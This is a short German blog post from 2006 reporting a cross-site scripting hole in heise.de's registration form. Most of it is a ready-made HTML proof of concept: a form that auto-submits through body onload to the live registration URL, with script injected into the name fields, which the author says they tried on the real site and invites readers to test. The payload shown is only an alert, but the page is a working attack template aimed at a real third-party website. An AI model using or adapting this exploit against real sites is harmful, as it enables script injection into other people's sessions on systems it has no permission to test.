Habe gerade News von Heise.de angeschaut und hier gesehen, dass man bei der Bundesregierung
lustige Abfragen per Cross Site Scripting ausfuehren kann 
Nun hab ich auf dem Blog von morph3us.org gelesen, dass Heise selbst eine solche Luecke
auf ihrer Seite hat und trotz seines Emails an den Webmaster die Luecke immernoch funktioniert 
(das war im Januar 06)
Hab ich natuerlich gleich ausprobiert und siehe da, es geht immernoch..
< form method="post" action="http://www.heise.de/registration/" name="heise" >
< input type="text" name="uid" size="20" value='' >
< input type="text" name="vorname" size="20"
value='">< script >alert(”andyrockt.com is watching you!”)< /script>‘ >
< input type="text" name="name" size="20"
value='">< script >alert(”andyrockt.com is watching you!”)< script>‘ >
< /form >
< body onload= "heise.submit();" >
Mit diesem simplen HTML-Code kann man CSS-Luecken bei Heise ausprobieren
Update 05.09.2006
Hab gerade gesehen, das sogar ein noch groeberes Loch vom Blogger auf Morph3us gefunden wurde.. *smile*
Hier mehr => http://morph3us.org/blog/?p=41
Test gefaellig? => http://www.andyrockt.com/sources/
Das Ergebniss seht ihr hier falls der Link nicht mehr funktionieren sollte :
